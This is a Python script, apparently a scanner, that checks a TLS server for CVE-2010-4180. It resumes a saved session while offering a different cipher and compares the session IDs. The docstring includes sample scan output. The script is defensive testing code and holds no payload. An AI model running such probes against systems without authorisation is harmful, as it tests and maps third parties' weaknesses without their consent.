CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
Master-Key: 1DEAFF8A6C400FB1958751910F0E63451CA6662C3147C48AED7C68A45AC940C8939E2E6954A167B516578BBFCEC51576
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
Start Time: 1614857820
Timeout : 7200 (sec)
Verify return code: 20 (unable to get local issuer certificate)
[*] Current Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Accepted cipher suites for TLS_1_2:
* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
* TLS_RSA_WITH_ARIA_256_GCM_SHA384
* TLS_RSA_WITH_ARIA_128_GCM_SHA256
* TLS_RSA_WITH_AES_256_GCM_SHA384
* TLS_RSA_WITH_AES_256_CCM_8
* TLS_RSA_WITH_AES_256_CCM
* TLS_RSA_WITH_AES_256_CBC_SHA256
* TLS_RSA_WITH_AES_256_CBC_SHA
* TLS_RSA_WITH_AES_128_GCM_SHA256
* TLS_RSA_WITH_AES_128_CCM_8
* TLS_RSA_WITH_AES_128_CCM
* TLS_RSA_WITH_AES_128_CBC_SHA256
* TLS_RSA_WITH_AES_128_CBC_SHA
* TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
* TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
* TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
* TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
* TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
* TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
[*] Resuming session with downgraded cipher: CAMELLIA256-SHA
SSL-Session:
Protocol : TLSv1.2
Cipher : CAMELLIA256-SHA
Session-ID: 9050C06AA9C2F039B2256275F044DE1EE7A9A0E41D1910645C1C7CAFCEEA3A45
Session-ID-ctx:
Master-Key: 85724393381819731AD31C437D2354E689C2E64FC30617BA650984280BA124D92BC01560C934A5F7441B1643D305B656
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 1b 69 77 97 dc 86 6c 22-08 a3 fc 33 dd 05 7d 3f .iw...l"...3..}?
0010 - 4e c3 da 12 06 da 2a a8-5a 67 ff 33 4d 9e f3 31 N.....*.Zg.3M..1
0020 - d8 03 d4 2f c9 03 f9 64-59 93 9a 16 58 64 f8 0a .../...dY...Xd..
0030 - ce c0 ab 67 0f 0d 27 e2-fe fa 70 c6 5d a9 96 0c ...g..'...p.]...
0040 - 19 b3 2e 1a 60 46 4a 63-ae a5 11 c6 a1 c6 66 b0 ....`FJc......f.
0050 - fa ae 05 e7 21 3a 1b df-c7 78 f3 2b 1c 57 f3 32 ....!:...x.+.W.2
0060 - d5 f3 fe 8c e2 bd 5d 3c-01 6b 35 aa 30 ac 48 53 ......]<.k5.0.HS
0070 - 58 35 4c 17 8f 2d e8 12-7c 91 b7 a3 c1 96 8e da X5L..-..|.......
0080 - 35 17 f5 b3 9d 6d 9b b1-fd d6 e3 e6 65 09 81 69 5....m......e..i
0090 - 64 cf 49 ad d0 8b 55 7e-ee fb f1 0a 31 1f b1 5d d.I...U~....1..]
00a0 - 0e 86 2e 4e 18 c5 bb ed-0e e7 d1 74 66 97 d8 41 ...N.......tf..A
00b0 - 15 7a 7e dc db 38 27 55-d5 7d 37 2f 43 06 73 aa .z~..8'U.}7/C.s.
Start Time: 1614857837
Timeout : 7200 (sec)
Verify return code: 20 (unable to get local issuer certificate)
[*] New Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
[+] x.x.x.x:443 is vulnerable to CVE-2010-4180
'''
from sslyze import (
ServerNetworkLocationViaDirectConnection,
ServerConnectivityTester,
Scanner,
ServerScanRequest,
ScanCommand,
ServerConnectivityInfo,
TlsVersionEnum,
ServerNetworkConfiguration,
ServerTlsProbingResult,
TlsVersionEnum,
ClientAuthRequirementEnum,
)
from nassl import _nassl
from nassl.legacy_ssl_client import LegacySslClient
from sslyze.server_connectivity import ServerConnectivityInfo, TlsVersionEnum
from sslyze.errors import ConnectionToServerFailed
import nassl, sys, optparse, json, sslyze, os
def getSupportedCiphers(server_info, tlsVer):
    """Return the names of the cipher suites the server accepts for *tlsVer*.

    Queues one sslyze scan (certificate info plus the cipher-suite command
    matching *tlsVer*), prints every accepted suite and collects the names.

    Args:
        server_info: Connectivity info for the server, passed straight to
            ``ServerScanRequest``.
        tlsVer: One of "TLS_1_0", "TLS_1_1" or "TLS_1_2"; any other value
            falls back to the TLS 1.0 cipher-suite scan.

    Returns:
        List of accepted cipher suite names (empty when the scan produced no
        result for the chosen command).
    """
    suiteScanByVersion = {
        "TLS_1_0": ScanCommand.TLS_1_0_CIPHER_SUITES,
        "TLS_1_1": ScanCommand.TLS_1_1_CIPHER_SUITES,
        "TLS_1_2": ScanCommand.TLS_1_2_CIPHER_SUITES,
    }
    scanCmd = suiteScanByVersion.get(tlsVer, ScanCommand.TLS_1_0_CIPHER_SUITES)

    scanner = Scanner()
    scanner.queue_scan(
        ServerScanRequest(
            server_info=server_info,
            scan_commands={ScanCommand.CERTIFICATE_INFO, scanCmd},
        )
    )

    acceptedNames = []
    for scanResult in scanner.get_results():
        try:
            suiteResult = scanResult.scan_commands_results[scanCmd]
            print("\nAccepted cipher suites for "+tlsVer+":")
            for accepted in suiteResult.accepted_cipher_suites:
                suiteName = accepted.cipher_suite.name
                print(f"* {suiteName}")
                acceptedNames.append(suiteName)
        except KeyError:
            # No result stored for this scan command: skip this server result.
            pass
    return acceptedNames
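def readJson(filename):
    """Load and return the JSON document stored in *filename*.

    The file is opened in a ``with`` block so the handle is closed even when
    parsing fails (the previous version never closed it).

    Args:
        filename: Path of the JSON file to read.

    Returns:
        The decoded JSON value.

    Raises:
        OSError: If the file cannot be opened.
        json.JSONDecodeError: If the content is not valid JSON.
    """
    # JSON text is UTF-8 by specification; do not depend on the locale default.
    with open(filename, "r", encoding="utf-8") as f:
        return json.load(f)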
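def main(hostname,portNo) -> None:
    """Check one server for CVE-2010-4180 (cipher change on session resumption).

    Steps, as implemented below:
      1. Load the NSS-name -> OpenSSL-name cipher mapping from ``tlsdb.json``.
      2. Handshake with TLS 1.2, then 1.1, then 1.0 until one is accepted,
         with stateless (ticket-based) resumption disabled, and keep the
         session and its session ID.
      3. List the cipher suites the server accepts for that version and pick
         one whose OpenSSL name differs from the cipher negotiated in step 2.
      4. Reconnect offering only that cipher while presenting the saved
         session. If the server answers with the same session ID the host is
         reported as vulnerable; otherwise it is reported as not vulnerable.

    Args:
        hostname: Server name or address to test.
        portNo: TCP port of the TLS service.

    The verdict is printed; nothing is returned. Calls ``sys.exit()`` when
    ``tlsdb.json`` is not present in the working directory.
    """
    filename="tlsdb.json"
    if not os.path.exists(filename):
        print("[-] "+filename+" is missing. Please download from https://raw.githubusercontent.com/tiran/tlsdb/master/tlsdb.json")
        sys.exit()
    cipherDBDict=readJson(filename)['ciphers']

    target=hostname+":"+str(portNo)
    ssl_version_downgrade=''
    tlsVer=""
    ssl_session=None
    versionsToTry=(
        (TlsVersionEnum.TLS_1_2, "TLS_1_2"),
        (TlsVersionEnum.TLS_1_1, "TLS_1_1"),
        (TlsVersionEnum.TLS_1_0, "TLS_1_0"),
    )
    for ssl_version_downgrade, tlsVer in versionsToTry:
        try:
            server_location = ServerNetworkLocationViaDirectConnection.with_ip_address_lookup(hostname, portNo)
            final_network_config = ServerNetworkConfiguration.default_for_server_location(server_location)
            server_info = ServerConnectivityTester().perform(server_location, final_network_config)
            currentCipher=server_info.tls_probing_result.cipher_suite_supported
            ssl_connection = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
            # Disable ticket-based resumption so the test exercises the
            # server-side session cache (session-ID resumption).
            ssl_connection.ssl_client.disable_stateless_session_resumption()
            ssl_connection.connect()
            print("[*] Connecting using Cipher: "+currentCipher)
            ssl_session = ssl_connection.ssl_client.get_session()
            sessionText=ssl_session.as_text()
            print(sessionText)
            # Prefer the cipher actually negotiated on this connection over
            # the one recorded by the connectivity probe.
            # NOTE(review): the marker must match the spacing of as_text()
            # output exactly - verify against a real session dump.
            for line in sessionText.split("\n"):
                if "Cipher : " in line:
                    currentCipher=line.split("Cipher :")[1].strip()
            session_string = (sessionText.split("Session-ID:"))[1]
            session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
            print("[*] Current Session_id: "+session_id)
            ssl_connection.close()
            break
        except sslyze.errors.ServerRejectedTlsHandshake:
            # This protocol version was refused; try the next (older) one.
            pass

    if ssl_session is None:
        # Every version was rejected, so there is no session to resume and
        # session_id was never assigned.
        print("[-] "+target+" rejected TLS 1.2, 1.1 and 1.0 handshakes; cannot test for CVE-2010-4180")
        return

    supportedCipherList=getSupportedCiphers(server_info,tlsVer)
    if len(supportedCipherList)>0:
        # Map the NSS-style names reported by the scan to OpenSSL names.
        cipherDBDict1={}
        for key in sorted(cipherDBDict):
            entry=cipherDBDict[key]
            cipherDBDict1[entry['nss']]=entry['openssl']

        # First accepted suite that has an OpenSSL name different from the
        # cipher already in use.
        chosenCipher=""
        for suiteName in supportedCipherList:
            if suiteName==currentCipher:
                continue
            candidate=cipherDBDict1.get(suiteName)
            if candidate and candidate!=currentCipher:
                chosenCipher=candidate
                break
        if not chosenCipher:
            # Without a second cipher the resumption attempt would only
            # fail inside OpenSSL and be misreported as "NOT vulnerable".
            print("[-] No alternative cipher suite found for "+target+"; cannot test for CVE-2010-4180")
            return

        try:
            print("\n[*] Resuming session with downgraded cipher: "+chosenCipher)
            tls_probing_result=ServerTlsProbingResult(highest_tls_version_supported=ssl_version_downgrade,cipher_suite_supported=chosenCipher,client_auth_requirement=ClientAuthRequirementEnum.DISABLED,supports_ecdh_key_exchange=False)
            server_info = ServerConnectivityInfo(server_location, final_network_config, tls_probing_result)
            ssl_connection1 = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
            try:
                ssl_connection1.ssl_client.set_session(ssl_session)
                # Fix: this was applied to the first, already closed
                # connection, leaving tickets enabled on the resumed one.
                ssl_connection1.ssl_client.disable_stateless_session_resumption()
                ssl_connection1.ssl_client.set_cipher_list(chosenCipher)
                ssl_connection1.connect()
                new_session = ssl_connection1.ssl_client.get_session()
                newSessionText=new_session.as_text()
                print(newSessionText)
                # Fix: the ID was previously parsed from the ORIGINAL session
                # text, so it always equalled session_id and every completed
                # handshake was reported as vulnerable.
                session_string = (newSessionText.split("Session-ID:"))[1]
                new_session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
                print("[*] New Session_id: "+new_session_id)
                # NOTE(review): an equal session ID shows the server resumed
                # the cached session; also confirming that the negotiated
                # cipher is chosenCipher would make the verdict stronger.
                if session_id==new_session_id:
                    print("[+] "+target+" is vulnerable to CVE-2010-4180")
                else:
                    print("[-] "+target+" is NOT vulnerable to CVE-2010-4180")
            finally:
                # Release the socket on the failure paths as well.
                ssl_connection1.close()
        except sslyze.errors.ServerRejectedTlsHandshake:
            print("[-] "+target+" is NOT vulnerable to CVE-2010-4180")
        except nassl._nassl.OpenSSLError:
            print("[-] "+target+" is NOT vulnerable to CVE-2010-4180")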
# Command-line entry: read -t/--target ("host" or "host:port") and run the check.
parser = optparse.OptionParser()
parser.add_option('-t','--target', action="store", dest="targetIP", help="target server (e.g. 4.2.2.2:443)")
options, remainder = parser.parse_args()
if not options.targetIP:
    print("[-] Please provide the -t or --target argument")
    sys.exit()
if ":" in options.targetIP:
    # NOTE(review): splitting on ":" means a bare IPv6 literal is not
    # understood as a host; only the first two fields are used.
    x = options.targetIP.split(":")
    hostname, portNo = x[0], x[1]
else:
    # No port given: default to HTTPS.
    hostname, portNo = options.targetIP, "443"
main(hostname, portNo)